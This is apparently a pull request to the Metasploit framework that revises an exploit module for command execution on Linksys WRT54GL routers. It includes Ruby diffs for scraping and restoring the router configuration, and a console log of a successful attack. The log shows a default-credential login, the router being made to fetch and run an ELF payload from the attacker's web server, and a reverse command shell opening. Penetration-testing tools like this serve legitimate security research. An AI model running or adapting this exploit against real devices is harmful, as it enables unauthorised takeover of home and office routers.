### PR TITLE
Linksys wrt54gl exec exploit

### DIFF
--- a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb
+++ b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb
@@ -71,13 +71,13 @@ class Metasploit3 < Msf::Exploit::Remote
 				OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
 				OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60]),
 				OptBool.new('RESTORE_CONF', [ true, 'Should we try to restore the original configuration', true ]),
-				OptString.new('LAN_PROTO', [ true, 'The device configuration for the local network, dhcp or static (default: dhcp)', 'dhcp' ]),
 			], self.class)
 	end
 
 
 	def get_config(config, pattern)
 		if config =~ /#{pattern}/
+			#print_line("found: #{$1}")	#debugging
 			return $1
 		end
 		return ""
@@ -107,15 +107,20 @@ class Metasploit3 < Msf::Exploit::Remote
 			fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
 		end
 
+		#now_proto and wan_proto should be the same and it should be dhcp! Nothing else tested!
 		@now_proto_orig = get_config(res.body, "<input\ type=hidden\ name=now_proto\ value=\'(.*)\'>")
 		if @now_proto_orig !~ /dhcp/
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Configuration not recognized, aborting to avoid breaking the device")
 		end
+		@wan_proto_orig = get_config(res.body, "var\ wan_proto\ =\ \'(.*)\'\;")
+		if @wan_proto_orig !~ /dhcp/
+			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Configuration not recognized, aborting to avoid breaking the device")
+		end
+		@lan_proto_orig = get_config(res.body, "<input\ type=\"radio\"\ name=\"lan_proto\"\ value=\"(.*)\"\ checked\ onClick=\"SelDHCP")
 		@daylight_time_orig = get_config(res.body, "<input\ type=hidden\ name=daylight_time\ value=(.*)>")
 		@lan_ipaddr_orig = get_config(res.body, "<input\ type=hidden\ name=\"lan_ipaddr\"\ value=(.*)>")
 		@wait_time_orig = get_config(res.body, "<input\ type=hidden\ name=\"wait_time\"\ value=(.*)>")
 		@need_reboot_orig = get_config(res.body, "<input\ type=hidden\ name=\"need_reboot\"\ value=(.*)>")
-		@wan_proto_orig = get_config(res.body, "var\ wan_proto\ =\ \'(.*)\'\;")
 		@lan_ipaddr_0_orig = get_config(res.body, "onBlur\=valid_range\\(this\,1\,223\,\"IP\"\\)\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_0\"\>")
 		@lan_ipaddr_1_orig = get_config(res.body, "\<INPUT\ class=num\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"IP\"\\)\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_1\">")
 		@lan_ipaddr_2_orig = get_config(res.body, "\<INPUT\ class=num maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"IP\"\\)\ size=3\ value=\'(.*)\'\ name=\"lan_ipaddr_2\">")
@@ -132,7 +137,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		@dhcp_num_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,1\,253\,\"Number%20of%20DHCP%20users\"\\)\;Sel_SubMask_onblur\\(this.form.lan_netmask\,this.form\\)\ size=3\ value=\'(.*)\'\ name=\"dhcp_num\"\ class=num><\/TD>")
 		@dhcp_start_orig = get_config(res.body, "Sel_SubMask_onblur\\(this.form.lan_netmask\,this.form\\)\ size=3\ value=\'(.*)\'\ name=\"dhcp_start\"\ class=num\ onChange=\"valid_dhcpd_start_ip\\(this.form\,\ this\\)\">")
 		@netmask_orig = get_config(res.body, "value=.*\ selected\>255\.255\.255\.(.*)\<\/OPTION\>")
-		@wan_dns_orig = get_config(res.body, "<input\ type=hidden\ name=wan_dns\ value=(.*)>")
+		@wan_dns_orig = get_config(res.body, "<input\ type=hidden\ name=wan_dns\ value=(.*)><INPUT\ maxLength=3")
 		@wan_dns0_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,223\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns0_0\"\ class=num\>")
 		@wan_dns0_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\' name=\"wan_dns0_1\"\ class=num\>")
 		@wan_dns0_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns0_2\"\ class=num\>")
@@ -145,7 +150,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		@wan_dns2_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\' name=\"wan_dns2_1\"\ class=num\>")
 		@wan_dns2_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns2_2\"\ class=num\>")
 		@wan_dns2_3_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,254\,\"DNS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_dns2_3\"\ class=num\>")
-		@wan_wins_orig = get_config(res.body, "<input\ type=hidden\ name=wan_wins\ value=(.*)>")
+		@wan_wins_orig = get_config(res.body, "<input\ type=hidden\ name=wan_wins\ value=(.*)><INPUT\ maxLength=3")
 		@wan_wins_0_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,223\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_0\"\ class=num>")
 		@wan_wins_1_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_1\"\ class=num>")
 		@wan_wins_2_orig = get_config(res.body, "<INPUT\ maxLength=3\ onBlur=valid_range\\(this\,0\,255\,\"WINS\"\\)\ size=3\ value=\'(.*)\'\ name=\"wan_wins_2\"\ class=num>")
@@ -199,7 +204,8 @@ class Metasploit3 < Msf::Exploit::Remote
 					'lan_ipaddr_2' => @lan_ipaddr_2_orig.to_s,
 					'lan_ipaddr_3' => @lan_ipaddr_3_orig.to_s,
 					'lan_netmask' => "255.255.255.#{@netmask_orig}",
-					'lan_proto' => @lan_proto_manual.to_s, # It should be configured with datastore['LAN_PROTO']
+					#'lan_proto' => @lan_proto_manual.to_s, # It should be configured with datastore['LAN_PROTO']
+					'lan_proto' => @lan_proto_orig.to_s,
 					'dhcp_check' => "1",
 					'dhcp_start' => @dhcp_start_orig.to_s,
 					'dhcp_num' => @dhcp_num_orig.to_s,
@@ -243,7 +249,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		rport = datastore['RPORT']
 		restore = datastore['RESTORE_CONF']
 		@timeout = 10
-		@lan_proto_manual = datastore['LAN_PROTO']
+		#@lan_proto_manual = datastore['LAN_PROTO']
 
 		#
 		# testing Login

--- a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb
+++ b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb
@@ -77,7 +77,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def get_config(config, pattern)
 		if config =~ /#{pattern}/
-			#print_line("found: #{$1}")	#debugging
 			return $1
 		end
 		return ""
@@ -159,18 +158,17 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def restore_conf(user,pass,uri)
 		# we have used most parts of the original configuration
-		# just need to restore pppoe_username
+		# just need to restore wan_hostname
 		cmd = @wan_hostname_orig.to_s
 		print_status("#{rhost}:#{rport} - Asking the Linksys device to reload original configuration")
 
-		# WARNING: restore of wan_hostname_orig not working!!!
 		res = request(cmd,user,pass,uri)
 
 		if (!res)
 			fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to reload original configuration")
 		end
 
-		#the device needs around 30 seconds to apply our current configuration
+		#the device needs around 10 seconds to apply our current configuration
 		print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
 		select(nil, nil, nil, @timeout)
 	end
@@ -204,7 +202,6 @@ class Metasploit3 < Msf::Exploit::Remote
 					'lan_ipaddr_2' => @lan_ipaddr_2_orig.to_s,
 					'lan_ipaddr_3' => @lan_ipaddr_3_orig.to_s,
 					'lan_netmask' => "255.255.255.#{@netmask_orig}",
-					#'lan_proto' => @lan_proto_manual.to_s, # It should be configured with datastore['LAN_PROTO']
 					'lan_proto' => @lan_proto_orig.to_s,
 					'dhcp_check' => "1",
 					'dhcp_start' => @dhcp_start_orig.to_s,
@@ -249,7 +246,6 @@ class Metasploit3 < Msf::Exploit::Remote
 		rport = datastore['RPORT']
 		restore = datastore['RESTORE_CONF']
 		@timeout = 10
-		#@lan_proto_manual = datastore['LAN_PROTO']
 
 		#
 		# testing Login

--- a/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb
+++ b/modules/exploits/linux/http/linksys_wrt54gl_apply_exec.rb
@@ -281,16 +281,13 @@ class Metasploit3 < Msf::Exploit::Remote
 			res = request(cmd,user,pass,uri)
 			if (!res)
 				fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-				restore_conf(user,pass,uri) if restore
 			else
 				print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
-				if restore
-					print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
-					select(nil, nil, nil, @timeout)
-					restore_conf(user,pass,uri)
-				end
 
 			end
+			print_status("#{rhost}:#{rport} - Waiting #{@timeout} seconds for reloading the configuration")
+			select(nil, nil, nil, @timeout)
+			restore_conf(user,pass,uri) if restore
 			return
 		end
 
@@ -349,6 +346,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# wait for payload download
 		if (datastore['DOWNHOST'])
+			#waiting some time so we could be sure that the device got the payload from our third party server
 			print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the Linksys device to download the payload")
 			select(nil, nil, nil, datastore['HTTP_DELAY'])
 		else


### PR DESCRIPTION
Hey guys,

 this is a first try to replace the auxiliary module linksys_wrt54gl_exec with a nice exploit module.

Exploiting Demo - 192.168.178.105 / 0 exploit(linksys_wrt54gl_apply_exec) > exploit
[_] Exploit running as background job.
Exploiting Demo - 192.168.178.105 / 0 exploit(linksys_wrt54gl_apply_exec) >
[_] Started reverse handler on 192.168.178.105:3333
[_] 192.168.178.122:80 - Trying to login with admin / admin
[+] 192.168.178.122:80 - Successful login admin/admin
[_] 192.168.178.122:80 - Trying to download the original configuration
[+] 192.168.178.122:80 - Successful downloaded the configuration
[_] 192.168.178.122:80 - Starting up our web service on http://192.168.178.105:8080/ZclrwttCkbMa ...
[_] Using URL: http://0.0.0.0:8080/ZclrwttCkbMa
[_]  Local IP: http://192.168.178.105:8080/ZclrwttCkbMa
[_] 192.168.178.122:80 - Asking the Linksys device to download http://192.168.178.105:8080/ZclrwttCkbMa
[_] 192.168.178.122:80 - Waiting for the victim to request the ELF payload...
[_] 192.168.178.122:80 - Sending the payload to the server...
[_] 192.168.178.122:80 - Asking the Linksys device to chmod ZclrwttCkbMa
[_] 192.168.178.122:80 - Waiting 10 seconds for reloading the configuration
[_] 192.168.178.122:80 - Asking the Linksys device to execute ZclrwttCkbMa
[_] 192.168.178.122:80 - Waiting 10 seconds for reloading the configuration
[_] Command shell session 27 opened (192.168.178.105:3333 -> 192.168.178.122:2099) at 2013-04-04 17:37:07 +0200
[+] Deleted /tmp/aaageznt
[_] 192.168.178.122:80 - Asking the Linksys device to reload original configuration
[_] 192.168.178.122:80 - Waiting 10 seconds for reloading the configuration
[_] Server stopped.

In most cases restoring the configuration works well. At least the IP, hostname, routername and subnet mask is no problem. The statical DNS server configuration within the DHCP config often breaks. Till now I have not found the reason for this and so we should use the ManualRanking.

Best,
Mike
